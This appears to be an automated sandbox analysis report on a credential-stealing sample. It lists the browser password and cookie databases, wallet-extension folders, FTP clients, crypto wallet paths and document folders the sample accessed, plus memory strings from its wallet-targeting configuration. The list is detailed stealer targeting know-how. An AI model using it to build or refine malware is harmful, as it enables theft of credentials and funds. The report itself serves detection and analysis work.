Source: Yara match File source: 2.2.setupx 1.exe1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.setupx 1.exe1.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.2253160823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1082664009.0000000002D39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Found many strings related to Crypto-Wallets (likely being stolen)
Source: setupx 1.exe1.exe, 00000002.00000003.1109274613.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: :2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wallets","m":["*"],"z":"WL!
Source: setupx 1.exe1.exe, 00000002.00000003.1109274613.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: h\\wallets","m":["*"],"z":"Wallets/ElectronCash","d":0,"fs":20971520},{"t":0H"
Source: setupx 1.exe1.exe, 00000002.00000003.1109274613.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: setupx 1.exe1.exe, 00000002.00000003.1109274613.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: e.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t"
Source: setupx 1.exe1.exe, 00000002.00000003.1109274613.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \"params\":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":0,"fs":20971520},{"t":0,"p":"%
Source: setupx 1.exe1.exe, 00000002.00000003.1109274613.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Exodus
Source: setupx 1.exe1.exe, 00000002.00000003.1109274613.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \"params\":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":0,"fs":20971520},{"t":0,"p":"%
Source: setupx 1.exe1.exe, 00000002.00000003.1109274613.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: setupx 1.exe1.exe, 00000002.00000003.1109274613.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.db Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqlite Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.json Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Roaming\FTPbox Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Roaming\FTPRush Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Searches for user specific document files
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Directory queried: C:\Users\user\Documents\DUUDTUBZFW Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Directory queried: C:\Users\user\Documents\DUUDTUBZFW Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Directory queried: C:\Users\user\Documents\KLIZUSIQEN Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Directory queried: C:\Users\user\Documents\KLIZUSIQEN Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Directory queried: C:\Users\user\Documents\EOWRVPQCCS Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Directory queried: C:\Users\user\Documents\EOWRVPQCCS Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Directory queried: C:\Users\user\Documents\KLIZUSIQEN Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Directory queried: C:\Users\user\Documents\KLIZUSIQEN Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Directory queried: C:\Users\user\Documents\DUUDTUBZFW Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Directory queried: C:\Users\user\Documents\DUUDTUBZFW Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Directory queried: C:\Users\user\Documents\EOWRVPQCCS Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Directory queried: C:\Users\user\Documents\EOWRVPQCCS Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Directory queried: C:\Users\user\Documents\TQDFJHPUIU Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe Directory queried: C:\Users\user\Documents\TQDFJHPUIU Jump to behavior
Yara detected Credential Stealer
